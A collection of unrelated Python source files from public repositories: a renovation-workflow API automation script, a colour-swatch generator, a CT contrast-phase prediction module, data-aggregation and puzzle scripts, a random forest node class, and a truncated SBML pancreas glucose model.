'http://decorate.ishangzu.com/isz_decoration/NewDecorationProjectController/proCheck/wholeCheck'\n IMG_CARDS = upLoadPhoto(url=self.uploadPhotoURL, filename='CARDS.png')\n IMG_THREE = upLoadPhoto(url=self.uploadPhotoURL, filename='THREE.png')\n data = {\n \"air_switch\": None,\n \"attachments\": None,\n \"card_attachs\": [{\n \"attach_type\": \"CARDS\",\n \"imgs\": [{\n \"url\": IMG_CARDS.url,\n \"img_id\": IMG_CARDS.id,\n \"create_name\": \"\",\n \"create_dept\": \"\",\n 
\"create_time\": \"\",\n \"sort\": 0,\n \"type\": \"\"\n }]\n }],\n \"closed_water_test_result\": None,\n \"curOneLevelNode\": None,\n \"curTwoLevelNode\": None,\n \"door_card\": None,\n \"door_key\": None,\n \"electricity_card\": None,\n \"electricity_meter_num\": None,\n \"electricity_meter_remain\": None,\n \"gas_card\": None,\n \"gas_meter_num\": None,\n \"gas_meter_remain\": None,\n \"grade\": None,\n \"landlordGoods\": None,\n \"newStuffList\": None,\n \"overall_check_date\": '%s 10:00:00' % addDays(1),\n \"project_id\": self.project_id,\n \"remark\": \"\",\n \"score_remark\": None,\n \"three_attachs\": [{\n \"attach_type\": \"THREE\",\n \"imgs\": [{\n \"url\": IMG_THREE.url,\n \"img_id\": IMG_THREE.id,\n \"create_name\": \"\",\n \"create_dept\": \"\",\n \"create_time\": \"\",\n \"sort\": 0,\n \"type\": \"\"\n }]\n }],\n \"water_card\": None,\n \"water_card_remain\": None,\n \"water_meter_num\": None\n }\n result = myRequest(url, data)\n if result:\n # consoleLog(u'整体验收完成')\n return\n\n def profee():\n \"\"\"物业交割\"\"\"\n url = 'http://decorate.ishangzu.com/isz_decoration/NewDecorationProjectController/proCheck/profee'\n IMG = upLoadPhoto(url=self.uploadPhotoURL, filename='PROPERTY_DELIVERY_ORDER.png')\n data = {\n \"air_switch\": \"\",\n \"door_card\": \"\",\n \"door_key\": \"\",\n \"electricity_card\": \"\",\n \"electricity_meter_num\": \"\",\n \"electricity_meter_remain\": \"\",\n \"gas_card\": \"\",\n \"gas_meter_num\": \"\",\n \"gas_meter_remain\": \"\",\n \"project_id\": self.project_id,\n \"water_card\": \"\",\n \"water_card_remain\": \"\",\n \"water_meter_num\": \"\",\n \"attachments\": [{\n \"attach_type\": \"PROPERTY_DELIVERY_ORDER\",\n \"imgs\": [{\n \"url\": IMG.url,\n \"img_id\": IMG.id,\n \"create_name\": \"\",\n \"create_dept\": \"\",\n \"create_time\": \"\",\n \"sort\": 0,\n \"type\": \"\"\n }]\n }],\n \"resource\": \"PROJECT_CHECK\"\n }\n result = myRequest(url, data)\n if result:\n # consoleLog(u'物业交割完成')\n return\n\n def costSettle():\n \"\"\"费用结算\"\"\"\n url = 'http://decorate.ishangzu.com/isz_decoration/NewDecorationProjectController/proCheck/costsettle'\n data = {\n \"project_id\": self.project_id,\n \"remark\": \"\"\n }\n result = myRequest(url, data)\n if result:\n # consoleLog(u'费用结算完成')\n return\n\n wholeCheck()\n profee()\n costSettle()\n\n def indoorImg(self):\n \"\"\"室内图\"\"\"\n url = 'http://decorate.ishangzu.com/isz_decoration/NewDecorationProjectController/proComp/indoor'\n IMG_LAYOUT = upLoadPhoto(url=self.uploadPhotoURL, filename='LAYOUT.png')\n data = {\n \"curOneLevelNode\": None,\n \"curTwoLevelNode\": None,\n \"deliver_room_date\": None,\n \"house_attachs\": [{\n \"attach_type\": \"PUBLIC_TOILET_1\",\n \"imgs\": [{\n \"url\": None,\n \"img_id\": None,\n \"create_name\": \"\",\n \"create_dept\": \"\",\n \"create_time\": \"\",\n \"sort\": 0,\n \"type\": \"PUBLIC_TOILET_1\"\n }]\n }, {\n \"attach_type\": \"KITCHEN_1\",\n \"imgs\": [{\n \"url\": None,\n \"img_id\": None,\n \"create_name\": \"\",\n \"create_dept\": \"\",\n \"create_time\": \"\",\n \"sort\": 1,\n \"type\": \"KITCHEN_1\"\n }]\n }, {\n \"attach_type\": \"PARLOUR_1\",\n \"imgs\": [{\n \"url\": None,\n \"img_id\": None,\n \"create_name\": \"\",\n \"create_dept\": \"\",\n \"create_time\": \"\",\n \"sort\": 2,\n \"type\": \"PARLOUR_1\"\n }]\n }, {\n \"attach_type\": \"METH\",\n \"imgs\": [{\n \"url\": None,\n \"img_id\": None,\n \"create_name\": \"\",\n \"create_dept\": \"\",\n \"create_time\": \"\",\n \"sort\": 3,\n \"type\": \"METH\"\n }]\n }, {\n \"attach_type\": \"ETH\",\n \"imgs\": [{\n 
\"url\": None,\n \"img_id\": None,\n \"create_name\": \"\",\n \"create_dept\": \"\",\n \"create_time\": \"\",\n \"sort\": 4,\n \"type\": \"ETH\"\n }]\n }, {\n \"attach_type\": \"PROP\",\n \"imgs\": [{\n \"url\": None,\n \"img_id\": None,\n \"create_name\": \"\",\n \"create_dept\": \"\",\n \"create_time\": \"\",\n \"sort\": 5,\n \"type\": \"PROP\"\n }]\n }, {\n \"attach_type\": \"BALCONY_1\",\n \"imgs\": [{\n \"url\": None,\n \"img_id\": None,\n \"create_name\": \"\",\n \"create_dept\": \"\",\n \"create_time\": \"\",\n \"sort\": 6,\n \"type\": \"BALCONY_1\"\n }]\n }, {\n \"attach_type\": \"BALCONY_2\",\n \"imgs\": [{\n \"url\": None,\n \"img_id\": None,\n \"create_name\": \"\",\n \"create_dept\": \"\",\n \"create_time\": \"\",\n \"sort\": 7,\n \"type\": \"BALCONY_2\"\n }]\n }],\n \"layout_attachs\": [{\n \"attach_type\": \"LAYOUT\",\n \"imgs\": [{\n \"url\": IMG_LAYOUT.url,\n \"img_id\": IMG_LAYOUT.id,\n \"create_name\": \"\",\n \"create_dept\": \"\",\n \"create_time\": \"\",\n \"sort\": 0,\n \"type\": \"\"\n }]\n }],\n \"project_id\": self.project_id,\n \"remark\": None\n }\n for house_attach in data['house_attachs']:\n IMG = upLoadPhoto(url=self.uploadPhotoURL, filename='%s.png' % house_attach['attach_type'])\n house_attach['imgs'][0]['url'] = IMG.url\n house_attach['imgs'][0]['img_id'] = IMG.id\n result = myRequest(url, data)\n if result:\n # consoleLog(u'室内图添加完成')\n return\n\n def delivery(self):\n \"\"\"交房\"\"\"\n url = 'http://decorate.ishangzu.com/isz_decoration/NewDecorationProjectController/proComp/delivery'\n data = {\n \"deliver_room_date\": '%s 10:00:00' % addDays(1),\n \"project_id\": self.project_id,\n \"remark\": \"\"\n }\n result = myRequest(url, data)\n if result:\n consoleLog(u'竣工完成')\n return\n\n def fitment(self):\n \"\"\"整个装修流程\"\"\"\n self.placeOrder() # 下单\n self.dispatchOrder() # 派单\n self.acceptOrder() # 接单\n self.survey() # 勘测\n self.projectOrder() # 项目计划\n self.configList() # 物品清单\n self.stuffList() # 装修清单\n self.hideAndStufCheck() # 施工中\n self.projectCheck() # 项目验收\n self.indoorImg() # 室内图\n self.delivery() # 竣工\n","repo_name":"bestwfl/isz","sub_path":"isz/decoration_new.py","file_name":"decoration_new.py","file_ext":"py","file_size_in_byte":56374,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"20306600570","text":"from sys import argv\nimport os\nfrom PIL import Image, ImageFont, ImageDraw, ImageColor\n\noutput_dimensions = (1612, 640)\nfont_size = 78\npadding = {\"top\": -14, \"right\": 3, \"bottom\": 5}\noutput_dir = os.path.join(os.getcwd(), \"output\")\n\nif os.path.isfile(output_dir):\n raise Exception(\"Specified output directory is a file\")\nelif not os.path.isdir(output_dir):\n os.mkdir(output_dir)\n\ntry:\n arg = argv[1]\nexcept IndexError as e:\n raise Exception(\"No hexcode argument received\")\n\ntry:\n int(arg, base=16)\nexcept ValueError:\n raise Exception(\"Only accepts hex digits for the colour code\")\n\noriginal_code = arg.upper()\n\nif len(arg) == 3:\n hex_list = map(lambda d: d * 2, arg)\n hexcode = \"#\" + \"\".join(hex_list)\nelif len(arg) == 6:\n hexcode = \"#\" + arg.upper()\nelse:\n raise Exception(\"Colour has to be either 3 or 6 hex digits long\")\n\nimage = Image.new(\"RGB\", output_dimensions, color=ImageColor.getrgb(hexcode))\n\nfont = ImageFont.truetype(\"NotoSans-CondensedBold.ttf\", font_size)\ndraw = ImageDraw.Draw(image)\n\nhex_str = \"#\" + original_code\nhexcode_text_size = font.getsize(hex_str)\n\ndraw.rectangle(\n (\n (0, output_dimensions[1] - 
hexcode_text_size[1] - padding[\"top\"]),\n (output_dimensions[0], output_dimensions[1]),\n ),\n fill=(255, 255, 255),\n)\n\ndraw.text(\n (\n output_dimensions[0] - hexcode_text_size[0] - padding[\"right\"],\n output_dimensions[1] - hexcode_text_size[1] - padding[\"bottom\"],\n ),\n hex_str,\n font=font,\n fill=0,\n)\n\nimage.save(os.path.join(output_dir, f\"{hex_str[1:]}.png\"))\n","repo_name":"eniallator/hexcode-to-mug","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":1562,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"41362123653","text":"import logging\nimport subprocess\nimport time\nfrom pathlib import Path\nfrom typing import Any, Dict, Optional, Union\n\nfrom boa_contrast.features import FeatureBuilder\nfrom boa_contrast.ml import ContrastRecognition\n\nlogger = logging.getLogger(__name__)\n\n\ndef predict(\n ct_path: Union[Path, str],\n segmentation_folder: Union[Path, str],\n phase_model_name: str = \"real_IV_class_HistGradientBoostingClassifier_5class_2023-07-20\",\n git_model_name: str = \"KM_in_GI_HistGradientBoostingClassifier_2class_2023-07-18\",\n one_mask_per_file: bool = True,\n store_custom_regions: bool = False,\n total_segmentation_name: str = \"total.nii.gz\",\n label_map: Optional[Dict[str, Any]] = None,\n) -> Optional[Dict[str, Any]]:\n # Download data for model\n ct_path = Path(ct_path)\n logger.info(\"Computing the features...\")\n start = time.time()\n fb = FeatureBuilder(\n dataset_id=\"inference\",\n one_mask_per_file=one_mask_per_file,\n store_custom_regions=store_custom_regions,\n total_segmentation_name=total_segmentation_name,\n label_map=label_map,\n )\n sample = fb.compute_features(\n ct_data_path=ct_path,\n segmentation_path=Path(segmentation_folder),\n )\n logger.info(f\"Features computed in {time.time() - start:0.5f}s\")\n if sample is None:\n logger.warning(\"The segmentation does not exist.\")\n return None\n\n logger.info(\"Computing the contrast phase prediction...\")\n\n pr_phase = ContrastRecognition(task=\"iv_phase\", model_name=phase_model_name)\n start = time.time()\n pr_output = list(pr_phase.predict_batch([sample]))[0]\n logger.info(f\"Phase prediction computed in {time.time() - start:0.5f}s\")\n\n logger.info(\"Computing the GIT contrast prediction...\")\n gitr = ContrastRecognition(task=\"git\", model_name=git_model_name)\n\n start = time.time()\n gitr_output = list(gitr.predict_batch([sample]))[0]\n logger.info(f\"GIT prediction computed in {time.time() - start:0.5f}s\")\n\n return dict(\n **{\"phase_\" + key: value for key, value in pr_output.items()},\n **{\"git_\" + key: value for key, value in gitr_output.items()},\n )\n\n\ndef compute_segmentation(\n ct_path: Path,\n segmentation_folder: Union[Path, str],\n device_id: Optional[int],\n user_id: Optional[str],\n compute_with_docker: bool,\n) -> Path:\n segmentation_folder = Path(segmentation_folder)\n example_output = segmentation_folder / \"liver.nii.gz\"\n vessels_output = segmentation_folder / \"liver_vessels.nii.gz\"\n tasks = []\n if example_output.exists():\n logger.info(\"The full body segmentation exists and will not be recomputed.\")\n else:\n tasks = [\"total\"]\n\n if vessels_output.exists():\n logger.info(\"The liver vessels segmentation exists and will not be recomputed.\")\n else:\n tasks.append(\"liver_vessels\")\n\n if example_output.exists() and vessels_output.exists():\n return segmentation_folder\n\n logger.info(\"Segmentation is being computed\")\n # TODO: Make the crop 
region liver findable by the totalsegmentator if multilabel is true\n if compute_with_docker:\n logger.info(\"Using docker.\")\n # TODO: Set the docker image to something more stable\n for task in tasks:\n logger.info(f\"Computing segmentation for task {task}\")\n command = (\n \"docker run \"\n + (f\"--user {user_id}:{user_id} \" if user_id is not None else \"\")\n + \"--rm \"\n + (f\"--gpus device={device_id} \" if device_id is not None else \"\")\n + \"--ipc=host \"\n f\"-v {ct_path.absolute()}:/image.nii.gz \"\n f\"-v {segmentation_folder.absolute()}:/output \"\n \"wasserth/totalsegmentator_container:master \"\n f\"TotalSegmentator -i /image.nii.gz -o /output -ta {task}\"\n )\n start = time.time()\n subprocess.run(\n command.split(\" \"),\n stdout=subprocess.PIPE,\n stderr=subprocess.STDOUT,\n shell=False,\n check=True,\n universal_newlines=True,\n )\n logger.info(\n f\"Segmentation computed for {task} in {time.time() - start:0.5f}s\"\n )\n else:\n logger.info(\"Using the TotalSegmentator package.\")\n\n from totalsegmentator.python_api import totalsegmentator\n\n for task in tasks:\n logger.info(f\"Computing segmentation for task {task}\")\n start = time.time()\n totalsegmentator(\n input=ct_path,\n output=segmentation_folder,\n task=task,\n ml=False,\n preview=False,\n force_split=False,\n nora_tag=\"None\",\n quiet=False,\n verbose=0,\n test=0,\n crop_path=None,\n )\n logger.info(\n f\"Segmentation computed for {task} in {time.time() - start:0.5f}s\"\n )\n\n return segmentation_folder\n","repo_name":"UMEssen/BOA-Contrast","sub_path":"boa_contrast/commands.py","file_name":"commands.py","file_ext":"py","file_size_in_byte":5078,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"21"} +{"seq_id":"8252048754","text":"#! 
/usr/bin/python\n\"\"\"\nCondense all the csv files into a single table with one row per object\n\"\"\"\nimport pandas as pd\nfrom pathlib import Path\n\n\nINPUT_DIR = Path(\n \"/home/jorge/Documents/data/CASU_411/tables/ascii_tables_no-tiled/output_dephase/\"\n)\nOUTPUT_DIR = Path(\n \"/home/jorge/Documents/data/CASU_411/tables/ascii_tables_no-tiled/agg/\"\n)\n\nfixed_columns = [\n \"GaiaDR2\",\n \"Gmag\",\n \"RA_ICRS\",\n \"DE_ICRS\",\n \"pmRA\",\n \"pmDE\",\n \"SOStype\",\n \"VCtype\",\n \"PS1type\",\n \"period\",\n]\ncols_to_group = [\"filter\", \"mag\"]\n\nrows = []\n\nfor file in INPUT_DIR.glob(\"*.csv\"):\n print(file)\n df = pd.read_csv(file)\n sfix = df[fixed_columns].iloc[0]\n smean = df[cols_to_group].groupby(\"filter\").mean().T.iloc[0]\n\n row = pd.concat([sfix, smean], axis=0)\n rows.append(row)\n\n\ndf = pd.DataFrame(rows)\nprint(df)\n\n\n# Save to file\nif not OUTPUT_DIR.exists():\n OUTPUT_DIR.mkdir(parents=True)\n\ndf.to_csv(OUTPUT_DIR / \"agg_values_RRLyrae.csv\", index=False)\n","repo_name":"jorgeanais/lightcurvex","sub_path":"tools/agg_output_dephase_objects.py","file_name":"agg_output_dephase_objects.py","file_ext":"py","file_size_in_byte":981,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"71972256052","text":"import random\nimport operator\nimport numpy as np\nimport pandas as pd\n\nfrom scipy import stats\n\nclass Node:\n def __init__(self, X, y, feats, metric='gini'):\n self.leaf = True\n self.X = X\n self.y = y\n self.features = feats\n self.criteria = None\n self.value = None\n self.max_val = (stats.mode(y)[0][0])\n self.is_cat = False\n self.values = self.get_values()\n self.samples = y.shape[0]\n self.metric = metric\n self.impurity = self.calc_criterion()\n self.left = None\n self.right = None\n self.tried = False\n\n def _gini(self, p):\n return(p*(1-p) + (1-p)*(1-(1-p)))\n\n def _entropy(self, p):\n return(-p*np.log2(p) - (1-p)*np.log2(1-p))\n\n def _error(self, p):\n return(1-np.max([p, 1-p]))\n\n def info_gain(self, left, right):\n return(self.impurity - \\\n (left.samples*left.impurity/self.samples) - \\\n (right.samples*right.impurity/self.samples))\n\n def print_node(self):\n if(self.leaf):\n print('Leaf node,', end=' ')\n else:\n print(self.criteria, end=' ')\n if(self.is_cat):\n print(\"== \" + str(self.value), end=' ')\n else:\n print(\"<= \" + str(self.value), end=' ')\n print(\", size: \" + str(self.samples) + ', imp: '+ str(self.calc_criterion()) + ', vals: ', self.values)\n\n def calc_criterion(self):\n method = getattr(self, '_'+self.metric)\n val = (sum([method(self.values[x]/self.samples) for x in self.values]))\n return(val)\n # return(sum([method(x/self.samples) for x in self.values]))\n\n def get_values(self):\n vals, counts = np.unique(self.y, return_counts=True)\n return(dict(zip(vals, counts)))\n # return(self.y.iloc[:,0].value_counts(sort=False).tolist())\n\n def best_class(self, root):\n temp = {}\n for key in self.values:\n temp[key] = self.values[key]/root.values[key]\n return(max(temp.items(), key=operator.itemgetter(1))[0])\n\n def split_node(self, min_sam, num_splits):\n max_info_gain = 0\n self.tried = True\n is_cat = (self.X.dtype == 'object')\n values = []\n if(is_cat):\n for i in range(self.X.shape[1]):\n temp_arr = (np.stack((self.X[:,i], self.y), axis=-1))\n vals = list(set(self.X[:,i]))\n if(len(vals) == 1):\n continue\n elif(len(vals) == 2):\n values.append((i, vals[1]))\n else:\n for x in vals:\n values.append((i, x))\n # print(values)\n # print()\n # 
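NOTE (added sketch comment): 'values' collects the candidate (column_index, value) split pairs, e.g. [(0, 'red'), (1, 'blue')]\n            # 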
print(\"Calculating splits...\")\n for i, val in values:\n X_left = self.X[self.X[:,i] == val]\n y_left = self.y[self.X[:,i] == val]\n X_right = self.X[self.X[:,i] != val]\n y_right = self.y[self.X[:,i] != val]\n if(X_left.shape[0] >= min_sam and X_right.shape[0] >= min_sam):\n temp_left = Node(X_left, y_left, self.features)\n temp_right = Node(X_right, y_right, self.features)\n else:\n continue\n # print(self.features[i] + \"==\" + str(val) + \" Info gain: \"+ str(self.info_gain(temp_left, temp_right)))\n if(self.info_gain(temp_left, temp_right) > max_info_gain):\n self.is_cat = True\n max_info_gain = self.info_gain(temp_left, temp_right)\n # print(self.features[i], val,max_info_gain)\n self.left = temp_left\n self.right = temp_right\n self.criteria = self.features[i]\n self.value = val\n else:\n values = []\n for i in range(self.X.shape[1]):\n vals = self.X[:,i]\n if(len(vals)>num_splits):\n temp_vals = random.sample(list(vals), k=num_splits)\n for x in temp_vals:\n values.append((i, x))\n else:\n for x in vals:\n values.append((i, x))\n for i, val in set(values):\n X_left = self.X[self.X[:,i] <= val]\n y_left = self.y[self.X[:,i] <= val]\n X_right = self.X[self.X[:,i] > val]\n y_right = self.y[self.X[:,i] > val]\n if(X_left.shape[0] >= min_sam and X_right.shape[0] >= min_sam):\n temp_left = Node(X_left, y_left, self.features)\n temp_right = Node(X_right, y_right, self.features)\n else:\n continue\n # print(self.features[i] + \"<=\" + str(val) + \" Info gain: \"+ str(self.info_gain(temp_left, temp_right)))\n if(self.info_gain(temp_left, temp_right) > max_info_gain):\n self.is_cat = False\n max_info_gain = self.info_gain(temp_left, temp_right)\n self.left = temp_left\n self.right = temp_right\n self.criteria = self.features[i]\n self.value = val\n if(self.criteria is not None):\n self.leaf = False\n self.X = None\n self.y = None\n","repo_name":"astronights/RandomForest_from_Scratch","sub_path":"rf_node.py","file_name":"rf_node.py","file_ext":"py","file_size_in_byte":5379,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"24419914630","text":"\"\"\"\n# Assignments - 3\n# Clean the Messy salary into integers for Data Processing\nsalary = '$876,001' \n\nHint:\n Remove the $\n Remove the ,\n Convert into integer\n\"\"\"\n\nsalary = '$876,001' \ns1=salary.replace('$','')\nlist1=s1.split(',')\ns=''.join(list1)\nsal=int(salary.replace(',', '').replace('$', ''))\nprint(sal)","repo_name":"sachinbhatiskb/python-training","sub_path":"salary string to int.py","file_name":"salary string to int.py","file_ext":"py","file_size_in_byte":317,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"38493620637","text":"import itertools\nimport operator\nfrom functools import reduce\n\nimport common.input_data as input_data\n\ndef get_first_bus_after_timestamp(timestamp: str, bus_ids: str) -> int:\n busses = [int(bus) for bus in bus_ids.split(\",\") if bus != 'x']\n for num in itertools.count(int(timestamp)):\n for bus in busses:\n if num % bus == 0:\n return bus * (num - int(timestamp))\n\n raise RuntimeError(\"Should not reach this code\")\n\n# from Cormen's Introduction to Algorithms\ndef extended_euclid(a: int, b: int)-> tuple[int, int, int]: # disable=C0103\n if b == 0:\n return (a, 1, 0)\n\n d, x_prime, y_prime = extended_euclid(b, a % b) # disable=C0103\n return d, y_prime, x_prime - (a // b)* y_prime\n\ndef inverse_mod(a: int, n: int) -> int: # disable=C0103\n _d,x,_y = extended_euclid(a, 
n) # disable=C0103\n return x\n\ndef find_timestamp_for_consecutive_busses(bus_ids: str) -> int:\n busses = [(index, int(bus)) for index, bus in enumerate(bus_ids.split(\",\")) if bus != 'x']\n modulus = reduce(operator.mul, [bus for index, bus in busses])\n value = sum((bus - index) * modulus//bus * inverse_mod(modulus//bus, bus)\n for index, bus in busses)\n return value % modulus\n\n\nBUS_DATA: list[str] = input_data.read(\"input/input13.txt\")\nTIMESTAMP, BUS_IDS = BUS_DATA\n\nif __name__ == \"__main__\":\n print(f\"First bus: {get_first_bus_after_timestamp(TIMESTAMP, BUS_IDS)}\")\n\n print(\"Timestamp with consecutive busses: \"\n f\"{find_timestamp_for_consecutive_busses(BUS_IDS)}\")\n","repo_name":"pviafore/AdventOfCode2020","sub_path":"challenge13.py","file_name":"challenge13.py","file_ext":"py","file_size_in_byte":1541,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"10596572138","text":"from pathlib import Path\n\nfrom sbmlutils.factory import *\nfrom sbmlutils.metadata import *\nfrom sbmlutils.examples.templates import terms_of_use\nfrom sbmlutils.cytoscape import visualize_sbml\n\nfrom panmin.model import annotations\n\nclass U(Units):\n \"\"\"UnitDefinitions.\"\"\"\n\n min = UnitDefinition(\"min\", \"min\")\n s = UnitDefinition(\"s\", \"s\")\n kg = UnitDefinition(\"kg\", \"kg\")\n m2 = UnitDefinition(\"m2\", \"meter^2\")\n mg = UnitDefinition(\"mg\", \"mg\")\n ml = UnitDefinition(\"ml\", \"ml\")\n mmole = UnitDefinition(\"mmole\", \"mmole\")\n per_min = UnitDefinition(\"per_min\", \"1/min\")\n mM = UnitDefinition(\"mM\", \"mmole/liter\")\n mmole_per_min = UnitDefinition(\"mmole_per_min\", \"mmole/min\")\n mmole_per_minl = UnitDefinition(\"mmole_per_minl\", \"mmole/min/l\")\n\n\n# -----------------------------------------------------------------------------\n# Pancreas Metabolism\n# -----------------------------------------------------------------------------\nmid = \"pancreas_min\"\nversion = 3\n\n_m = Model(\n sid=f\"{mid}_{version}\",\n name=f\"Pancreas minimal glucose model version {version}\",\n notes=\"\"\"\n # Pancreas minimal glucose model.\n \"\"\"\n + terms_of_use,\n units=U,\n model_units=ModelUnits(\n time=U.min,\n extent=U.mmole,\n substance=U.mmole,\n length=U.meter,\n area=U.m2,\n volume=U.liter,\n ),\n creators=[\n Creator(\n familyName=\"Koenig\",\n givenName=\"Matthias\",\n email=\"koenigmx@hu-berlin.de\",\n organization=\"Humboldt-University Berlin, Institute for Theoretical Biology\",\n site=\"https://livermetabolism.com\",\n ),\n ],\n)\n\n\n# volume for model (FIXME: scale to beta-cell)\npancreas_volume = 0.5 # [L]\nspecies_in_amounts = False\n\n_m.compartments = [\n Compartment(\n \"Vpa\",\n value=pancreas_volume,\n unit=U.liter,\n constant=True,\n name=\"pancreas tissue\",\n sboTerm=SBO.PHYSICAL_COMPARTMENT,\n port=True,\n annotations=annotations.compartments[\"pa\"],\n ),\n Compartment(\n \"Vext\", value=5.0, unit=U.liter, constant=True, name=\"pancreas blood\", port=True,\n sboTerm=SBO.PHYSICAL_COMPARTMENT,\n annotations=annotations.compartments[\"blood\"],\n ),\n Compartment(\n \"Vmem\",\n value=1.0,\n unit=U.m2,\n constant=True,\n name=\"pancreas plasma membrane\",\n sboTerm=SBO.PHYSICAL_COMPARTMENT,\n annotations=annotations.compartments[\"plasma membrane\"],\n ),\n]\n\n_m.species = [\n Species(\n \"Aext_glc\",\n compartment=\"Vext\",\n initialConcentration=5.0,\n substanceUnit=U.mmole,\n name=\"glucose\",\n hasOnlySubstanceUnits=True,\n sboTerm=SBO.SIMPLE_CHEMICAL,\n port=True,\n 
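# NOTE (added): SBML boundaryCondition=True means reactions do not change this species' amount\n        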
boundaryCondition=True,\n annotations=annotations.species[\"glc\"],\n ),\n Species(\n \"Aext_lac\",\n compartment=\"Vext\",\n initialConcentration=0.8,\n substanceUnit=U.mmole,\n name=\"lactate\",\n hasOnlySubstanceUnits=True,\n sboTerm=SBO.SIMPLE_CHEMICAL,\n port=True,\n annotations=annotations.species[\"lac\"],\n ),\n Species(\n \"Aext_ins\",\n compartment=\"Vext\",\n initialConcentration=60e-9,\n substanceUnit=U.mmole,\n name=\"insulin\",\n hasOnlySubstanceUnits=True,\n sboTerm=SBO.MACROMOLECULE,\n port=True,\n annotations=annotations.species[\"ins\"],\n ),\n Species(\n \"Aext_cpep\",\n compartment=\"Vext\",\n initialConcentration=0,\n substanceUnit=U.mmole,\n name=\"c-peptide\",\n hasOnlySubstanceUnits=True,\n sboTerm=SBO.MACROMOLECULE,\n port=True,\n annotations=annotations.species[\"cpep\"],\n ),\n Species(\n \"Apa_glc\",\n compartment=\"Vpa\",\n initialConcentration=5.0,\n substanceUnit=U.mmole,\n name=\"glucose\",\n sboTerm=SBO.SIMPLE_CHEMICAL,\n hasOnlySubstanceUnits=True,\n annotations=annotations.species[\"glc\"],\n ),\n Species(\n \"Apa_lac\",\n compartment=\"Vpa\",\n initialConcentration=0.8,\n substanceUnit=U.mmole,\n name=\"lactate\",\n sboTerm=SBO.SIMPLE_CHEMICAL,\n hasOnlySubstanceUnits=True,\n annotations=annotations.species[\"lac\"],\n ),\n]\n\nrules = []\nif species_in_amounts:\n # concentration rules\n for s in _m.species:\n rules.append(\n AssignmentRule(\n f\"C{s.sid[1:]}\",\n f\"{s.sid}/{s.compartment}\",\n U.mM,\n name=f\"{s.name} concentration ({s.compartment})\",\n ),\n )\n\n_m.reactions = [\n Reaction(\n sid=\"GLCIM\",\n name=\"glucose import\",\n equation=\"Aext_glc <-> Apa_glc\" if species_in_amounts else \"Cext_glc <-> Cpa_glc\",\n compartment=\"Vmem\",\n sboTerm=SBO.TRANSPORT_REACTION,\n pars=[\n Parameter(\"GLCIM_Vmax\", 100.0, U.mmole_per_minl,\n name=\"Vmax glucose import\", sboTerm=SBO.MAXIMAL_VELOCITY),\n Parameter(\"GLCIM_Km\", 1.0, U.mM,\n name=\"Km glucose import\", sboTerm=SBO.MICHAELIS_CONSTANT\n ),\n ],\n rules=[],\n formula=(\n \"Vpa * GLCIM_Vmax/GLCIM_Km * (Cext_glc-Cpa_glc)/(1 dimensionless + Cext_glc/GLCIM_Km + Cpa_glc/GLCIM_Km)\",\n U.mmole_per_min,\n ),\n ),\n Reaction(\n sid=\"LACEX\",\n name=\"lactate export\",\n equation=\"Apa_lac <-> Aext_lac\"\n if species_in_amounts\n else \"Cpa_lac <-> Cext_lac\",\n compartment=\"Vmem\",\n sboTerm=SBO.TRANSPORT_REACTION,\n pars=[\n Parameter(\"LACEX_Vmax\", 100.0, U.mmole_per_minl, name=\"Vmax lactate export\",\n sboTerm=SBO.MAXIMAL_VELOCITY),\n Parameter(\"LACEX_Km\", 0.5, U.mM,\n name=\"Km lactate export\", sboTerm=SBO.MICHAELIS_CONSTANT),\n ],\n rules=[],\n formula=(\n \"Vpa * LACEX_Vmax/LACEX_Km * (Cpa_lac-Cext_lac)/(1 dimensionless + Cext_lac/LACEX_Km + Cpa_lac/LACEX_Km)\",\n U.mmole_per_min,\n ),\n ),\n Reaction(\n sid=\"GLC2LAC\",\n name=\"glycolysis\",\n equation=\"Apa_glc -> 2 Apa_lac\"\n if species_in_amounts\n else \"Cpa_glc -> 2 Cpa_lac\",\n compartment=\"Vpa\",\n sboTerm=SBO.BIOCHEMICAL_REACTION,\n pars=[\n Parameter(\n \"GLC2LAC_Vmax\", 0.1, U.mmole_per_minl, name=\"Vmax glucose utilization (glycolysis)\",\n sboTerm=SBO.MAXIMAL_VELOCITY\n ),\n Parameter(\"GLC2LAC_Km\", 4.5, U.mM,\n name=\"Km effective glucose utilization (glycolysis)\", sboTerm=SBO.MICHAELIS_CONSTANT\n ),\n ],\n rules=[],\n formula=(\n \"Vpa * GLC2LAC_Vmax * (Cpa_glc/(Cpa_glc + GLC2LAC_Km))\",\n U.mmole_per_min,\n ),\n ),\n Reaction(\n sid=\"IRS\",\n name=\"IRS insulin secretion\",\n equation=\"-> Aext_ins + Aext_cpep [Apa_glc]\"\n if species_in_amounts\n else \"-> Cext_ins + Cext_cpep [Cpa_glc]\",\n 
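# NOTE (added): the species in [brackets] is a modifier - glucose drives secretion without being consumed\n        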
compartment=\"Vmem\",\n sboTerm=SBO.TRANSPORT_REACTION,\n pars=[\n Parameter(\n \"IRS_Vmax\",\n 1.6e-6,\n U.mmole_per_minl, # 40/1000/60\n name=\"Vmax insulin secretion\",\n sboTerm=SBO.MAXIMAL_VELOCITY\n ),\n Parameter(\"IRS_n_glc\", 4, U.dimensionless,\n name=\"Hill coeffient glucose in insulin secretion\", sboTerm=SBO.HILL_COEFFICIENT),\n Parameter(\"IRS_Km_glc\", 7.0, U.mM,\n name=\"Km glucose insulin secretion\", sboTerm=SBO.MICHAELIS_CONSTANT),\n ],\n rules=[],\n formula=(\n \"Vpa * IRS_Vmax * power(Cpa_glc, IRS_n_glc) / \"\n \"(power(Cpa_glc, IRS_n_glc) + power(IRS_Km_glc, IRS_n_glc))\",\n U.mmole_per_min,\n ),\n notes=\"\"\"\n # Insulin secretion\n - equimolar secretion of insulin and c-peptide\n - hill kinetics of secretion depending on glucose\n \"\"\"\n ),\n]\n\nif not species_in_amounts:\n # replace species ids\n replacements = {\"Aext\": \"Cext\", \"Apa\": \"Cpa\"}\n for s in _m.species:\n sid_new = 